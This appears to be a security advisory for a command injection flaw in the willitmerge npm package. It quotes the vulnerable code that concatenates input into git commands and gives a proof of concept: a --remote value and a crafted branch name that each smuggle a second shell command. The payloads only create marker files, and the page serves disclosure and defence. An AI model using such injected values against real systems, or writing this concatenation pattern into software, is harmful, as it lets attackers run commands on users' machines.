
GHSA-j9wj-m24m-7jj6
JavaScript vulnerability analysis and mitigation

willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in version willitmerge@0.2.1. Resources:

Background on exploitation

Reporting a Command Injection vulnerability in the willitmerge npm package. The vulnerability arises because the package uses the insecure child process execution API (exec) and concatenates user input into the command string, whether that input is supplied via a command-line flag or is under user control in the target repository.

Exploit

POC 1

  1. Install willitmerge
  2. Run it with the following command:

       willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"

  3. Confirm the file /tmp/hel is created on disk

GitHub-sourced attack vector

Lines 189-197 in lib/willitmerge.js pass user input controlled by repository collaborators into the git command:

  var cmds = [
    'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
    'git remote add ' + branch + ' ' + gitUrl,
    'git pull ' + branch + ' ' + iss.head.ref,
    'git reset --merge HEAD',
    'git checkout ' + origBranch,
    'git branch -D ' + branch,
    'git remote rm ' + branch
  ];

Users can create malicious branch names such as ;{echo,hello,world}>/tmp/c that are then interpolated into these commands. This is a similar attack vector to the one reported for the pullit vulnerability (https://security.snyk.io/vuln/npm:pullit:20180214).

Author

Liran Tal


Source: NVD

Related JavaScript vulnerabilities:

  CVE ID               Severity  Score  Technologies  Component name    CISA KEV exploit  Has fix  Published date
  CVE-2025-66031       HIGH      8.7    JavaScript    node-node-forge   No                Yes      Nov 26, 2025
  CVE-2025-66035       HIGH      7.7    JavaScript    @angular/common   No                Yes      Nov 26, 2025
  CVE-2025-66028       MEDIUM    6.9    JavaScript    @oneuptime/common No                Yes      Nov 26, 2025
  CVE-2025-66030       MEDIUM    6.3    JavaScript    node-node-forge   No                Yes      Nov 26, 2025
  GHSA-j9wj-m24m-7jj6  MEDIUM    N/A    JavaScript    willitmerge       No                No       Nov 26, 2025
